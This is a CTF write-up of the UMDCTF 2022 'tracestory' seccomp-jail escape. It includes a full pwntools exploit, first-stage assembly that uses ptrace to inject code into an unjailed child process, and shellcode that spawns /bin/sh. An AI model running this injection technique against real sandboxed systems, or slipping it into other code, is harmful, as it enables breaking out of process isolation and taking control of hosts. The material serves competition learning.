seccomp jail escape using ptrace

Here's a short writeup on the seccomp jail escape in UMDCTF 2022 (tracestory).

I'll skip the reversing part since it was pretty straightforward. The binary forks before setting up seccomp and reading in shellcode from stdin. It allows us to use the following syscalls in our shellcode:

❯ seccomp-tools dump ./trace_story
[DEBUG] child pid: 7816
Input:
shellcode go here
 line  CODE  JT   JF      K
=================================
 0000: 0x20 0x00 0x00 0x00000004  A = arch
 0001: 0x15 0x00 0x18 0xc000003e  if (A != ARCH_X86_64) goto 0026
 0002: 0x20 0x00 0x00 0x00000000  A = sys_number
 0003: 0x35 0x00 0x01 0x40000000  if (A < 0x40000000) goto 0005
 0004: 0x15 0x00 0x15 0xffffffff  if (A != 0xffffffff) goto 0026
 0005: 0x15 0x13 0x00 0x00000003  if (A == close) goto 0025
 0006: 0x15 0x12 0x00 0x00000004  if (A == stat) goto 0025
 0007: 0x15 0x11 0x00 0x00000005  if (A == fstat) goto 0025
 0008: 0x15 0x10 0x00 0x00000006  if (A == lstat) goto 0025
 0009: 0x15 0x0f 0x00 0x0000000a  if (A == mprotect) goto 0025
 0010: 0x15 0x0e 0x00 0x0000000c  if (A == brk) goto 0025
 0011: 0x15 0x0d 0x00 0x00000015  if (A == access) goto 0025
 0012: 0x15 0x0c 0x00 0x00000018  if (A == sched_yield) goto 0025
 0013: 0x15 0x0b 0x00 0x00000020  if (A == dup) goto 0025
 0014: 0x15 0x0a 0x00 0x00000021  if (A == dup2) goto 0025
 0015: 0x15 0x09 0x00 0x00000038  if (A == clone) goto 0025
 0016: 0x15 0x08 0x00 0x0000003c  if (A == exit) goto 0025
 0017: 0x15 0x07 0x00 0x0000003e  if (A == kill) goto 0025
 0018: 0x15 0x06 0x00 0x00000050  if (A == chdir) goto 0025
 0019: 0x15 0x05 0x00 0x00000051  if (A == fchdir) goto 0025
 0020: 0x15 0x04 0x00 0x00000060  if (A == gettimeofday) goto 0025
 0021: 0x15 0x03 0x00 0x00000065  if (A == ptrace) goto 0025
 0022: 0x15 0x02 0x00 0x00000066  if (A == getuid) goto 0025
 0023: 0x15 0x01 0x00 0x00000068  if (A == getgid) goto 0025
 0024: 0x15 0x00 0x01 0x000000e7  if (A != exit_group) goto 0026
 0025: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0026: 0x06 0x00 0x00 0x00000000  return KILL

Most importantly, we have very few useful syscalls besides ptrace; we can't even read from or write to files! Luckily, ptrace can do quite a few things, like pausing execution, reading and writing memory, and so on.

So we need to somehow take control of the forked process and execute some shellcode there without the limitations imposed by seccomp. Our first-stage shellcode therefore has to perform the following steps:

  1. Take control over the forked process. Also known as attach in ptrace parlance.
  2. Find the instruction pointer.
  3. Write our second stage to its location.
  4. Continue execution.

The first and second steps are outlined below. They are assembled with pwntools, but that is omitted in the listing.

/* ptrace_attach: syscall(SYS_ptrace, PTRACE_ATTACH, child, 0, 0) */
/* Will pause the execution of the child process and attach ptrace */
mov rax, 101; /* SYS_ptrace (0x65 in the seccomp allow-list above) */
mov rdi, 16; /* request = PTRACE_ATTACH */
mov rsi, {child}; /* We are given the PID in stdout! */
mov rdx, 0; /* addr: unused for this request */
mov r10, 0; /* data: unused for this request */
syscall;

/* getregs syscall(SYS_ptrace, PTRACE_GETREGS, child, 0, rsp+100) */
/* Writes register values from the child to [r10], this is
   how we find the instruction pointer                            */
/* Reserve scratch stack space for the register dump. The dump is read at
   offset 128 below, so it is larger than 120 bytes: on x86-64 struct
   user_regs_struct is 27 * 8 = 216 bytes, and 100 + 216 fits in 512. */
sub rsp, 512;

mov rax, 101; /* SYS_ptrace */
mov rdi, 12; /* request = PTRACE_GETREGS */
mov rsi, {child};
mov rdx, 0; /* addr: unused for this request */
lea r10, [rsp + 100]; /* data = buffer that receives the registers */
syscall;

/* set r12 to rip (child rip); rip sits at offset 128 of the register dump */
mov r12, [rsp + 100 + 128];
Warning! CTF-level code quality

Before we write the second stage to the child process we need a second stage. In this case I quickly took it from shell-storm.org.

/* Second stage: starts a shell in the child via the syscall numbered 0x142. */
/* nop sled (the full listing puts 200 nops here) */
push   0x42
pop    rax                         /* rax = 0x42 */
inc    ah                          /* bumps bits 8-15: rax = 0x142 (322, execveat on x86-64) */
cqo                                /* sign-extend rax into rdx; rax is positive, so rdx = 0 */
push   rdx                         /* 8 zero bytes: NUL terminator for the path string */
movabs rdi, 0x68732f2f6e69622f     /* little-endian bytes of "/bin//sh" */
push   rdi                         /* the string now lives on the stack */
push   rsp
pop    rsi                         /* rsi = pointer to "/bin//sh" (pathname argument) */
mov    r8, rdx                     /* r8 = 0 (fifth syscall argument) */
mov    r10, rdx                    /* r10 = 0 (fourth syscall argument) */
/* NOTE(review): rdi (first argument, dirfd) still holds the string bytes;
   presumably ignored because the path is absolute - confirm against execveat(2). */
syscall
/* nop sled (the full listing appends 13 nops here) */
Second stage payload that is written to the child process.

We also need to use ptrace to write our payload. Annoyingly, PTRACE_POKETEXT only writes a single word per call, so the payload has to be written in small chunks (4 bytes at a time here), each with its own syscall.

# Each PTRACE_POKETEXT call (request 4) writes only a single word, so the
# second stage is written piecewise: one ptrace syscall per 4 payload bytes.
write_bytes = ""
for i in range(0, len(child_shcode), 4):
	# A short final chunk is padded on the RIGHT with NOPs (0x90) so the real
	# bytes keep their offsets and the filler is harmless. Left-padding with
	# ASCII "0" (0x30) would shift the payload and inject junk opcodes.
	chunk = child_shcode[i:i+4].ljust(4, b"\x90")
	write_bytes += f"""
	mov rax, 101;
	mov rdi, 4;
	mov rsi, {child};

	/* Memory location to write to */
	mov rdx, [rsp + 100 + 128];
	add rdx, {i};

	/* Payload bytes */
	mov r10, {u32(chunk)};
	syscall;

	add r12, 4; /* r12 came in handy here */
	"""
shellcode_a += asm(write_bytes)
Writing the second stage payload to the child process.

Now that we have written the second stage to the location of the child process's instruction pointer, all that is left is to restart execution. To avoid killing the child process we leave the parent process in an infinite loop.

/* detach ptrace and restart execution */
/* syscall(SYS_ptrace, PTRACE_DETACH, child, 0, 0) */
mov rax, 101; /* SYS_ptrace */
mov rdi, 17; /* request = PTRACE_DETACH */
mov rsi, {child};
mov rdx, 0;
mov r10, 0; /* data = 0 */
syscall;

/* Not a real yield: this is the deliberate infinite loop that keeps the
   parent alive. eax stays 1, so "test eax, 1" never sets ZF and the jump
   is always taken. */
mov eax, 1
loop:
test eax, 1
jne loop;

/* exit cleanly: syscall(SYS_exit, 0). Never reached, because the loop
   above does not terminate. */
mov rax, 60;
mov rdi, 0;
syscall;

Profit! We have a shell (or can do whatever else we want by modifying the second stage).

Below is a full listing of the exploit:

from pwn import *
from pwnlib import util

# Exploit driver: sends a first-stage shellcode to the seccomp-jailed parent.
# That shellcode ptrace-attaches to the forked (unjailed) child, overwrites the
# code at the child's instruction pointer with a shell-spawning second stage,
# and detaches so the child runs it.

# Assigning context.binary also configures pwntools for the binary's target.
elf = context.binary = ELF("./trace_story")
# context.local() merely returns a context manager and changes nothing unless
# it is used in a `with` block, so apply the settings with update() instead.
context.update(os='linux', arch='amd64')

# Swap the two lines below to test against a local copy of the binary.
#p = process(elf.path)
p = remote("0.cloud.chals.io", 15148)
p.recvuntil(b": ")
child = int(p.recvuntil(b"\n")) # get child pid
p.recvline()

log.info(f"Child PID: {child}")

# x86-64 Linux syscall numbers used by the first stage.
SYS_PTRACE = 101
SYS_EXIT = 60

# ptrace request codes (first syscall argument, passed in rdi).
PTRACE_POKETEXT = 4
PTRACE_GETREGS = 12
PTRACE_SETREGS = 13
PTRACE_ATTACH = 16
PTRACE_DETACH = 17

# Byte offsets of the registers we touch inside the GETREGS/SETREGS dump
# (struct user_regs_struct on x86-64).
RAX_OFFSET = 80
RDX_OFFSET = 96
RIP_OFFSET = 128

# Payload bytes carried by each POKETEXT syscall.
CHUNK = 4
NOP = b"\x90"

# Second stage, spawns shell. The leading 200-nop sled tolerates an imprecise
# landing address; the shellcode itself loads rax = 0x142 and points rsi at
# "/bin//sh" on the stack before issuing the syscall.
child_shcode = asm("nop; " * 200 + """
push   0x42
pop    rax
inc    ah
cqo
push   rdx
movabs rdi, 0x68732f2f6e69622f
push   rdi
push   rsp
pop    rsi
mov    r8, rdx
mov    r10, rdx
syscall
""" + "nop; " * 13)

# x86-64 syscall ABI: number in rax; arguments in rdi, rsi, rdx, r10, r8, r9;
# result in rax. For ptrace that is (request, pid, addr, data).
#
# NOTE(review): nothing waits for the child to actually stop after
# PTRACE_ATTACH (wait4 is not in the seccomp allow-list), so the following
# requests presumably race with the stop - confirm if the exploit is flaky.
shellcode_a = asm(f"""
nop;
nop;
nop;
nop;

/* ptrace_attach */
mov rax, {SYS_PTRACE};
mov rdi, {PTRACE_ATTACH};
mov rsi, {child};
mov rdx, 0;
mov r10, 0;
syscall;

/* getregs syscall(SYS_ptrace, PTRACE_GETREGS, child, 0, rsp+100) */
/* scratch space for the register dump: user_regs_struct is 216 bytes */
sub rsp, 512;

mov rax, {SYS_PTRACE};
mov rdi, {PTRACE_GETREGS};
mov rsi, {child};
mov rdx, 0;
lea r10, [rsp + 100];
syscall;

/* set r12 to rip */
mov r12, [rsp + 100 + {RIP_OFFSET}];
""")


# Generate the code that writes the second stage into the child, one ptrace
# POKETEXT syscall per CHUNK bytes, starting at the child's saved rip.
poke_snippets = []
for i in range(0, len(child_shcode), CHUNK):
    # Pad a short final chunk on the RIGHT with NOPs so the real bytes keep
    # their offsets and the filler is harmless. Left-padding with ASCII "0"
    # (0x30) would shift the payload and inject junk opcodes.
    chunk = child_shcode[i:i + CHUNK].ljust(CHUNK, NOP)
    poke_snippets.append(f"""
    mov rax, {SYS_PTRACE};
    mov rdi, {PTRACE_POKETEXT};
    mov rsi, {child};

    /* destination = child rip + offset of this chunk */
    mov rdx, [rsp + 100 + {RIP_OFFSET}];
    add rdx, {i};

    /* payload bytes */
    mov r10, {u32(chunk)};
    syscall;

    /* r12 tracks the write cursor but is not read anywhere */
    add r12, {CHUNK};
    """)
shellcode_a += asm("".join(poke_snippets))

# Patch the saved registers before resuming the child: zero rax and rdx and
# move rip two bytes forward.
# NOTE(review): the +2 presumably compensates for the kernel rewinding rip by
# the 2-byte syscall instruction when it restarts an interrupted syscall;
# either way the new rip lands inside the nop sled - confirm.
shellcode_a += asm(f"""
/* setregs */

mov rax, 0x0;
mov [rsp + 100 + {RAX_OFFSET}], rax
mov rax, 0x0;
mov [rsp + 100 + {RDX_OFFSET}], rax

/* rip */
mov rax, [rsp + 100 + {RIP_OFFSET}];
add rax, 2;
mov [rsp + 100 + {RIP_OFFSET}], rax


/* syscall(SYS_ptrace, PTRACE_SETREGS, child, 0, rsp+100) */
mov rax, {SYS_PTRACE};
mov rdi, {PTRACE_SETREGS};
mov rsi, {child};
mov rdx, 0;
lea r10, [rsp + 100];
syscall;

/* detach */
mov rax, {SYS_PTRACE};
mov rdi, {PTRACE_DETACH};
mov rsi, {child};
mov rdx, 0;
mov r10, 0;
syscall;

/* spin forever so the parent stays alive; eax stays 1, so jne is always taken */
mov eax, 1
loop:
test eax, 1
jne loop;

/* exit (unreachable after the loop above) */
mov rax, {SYS_EXIT};
mov rdi, 0;
syscall;
""")


log.info(f"Shellcode siz is {len(shellcode_a)}")

p.sendline(shellcode_a)
p.interactive()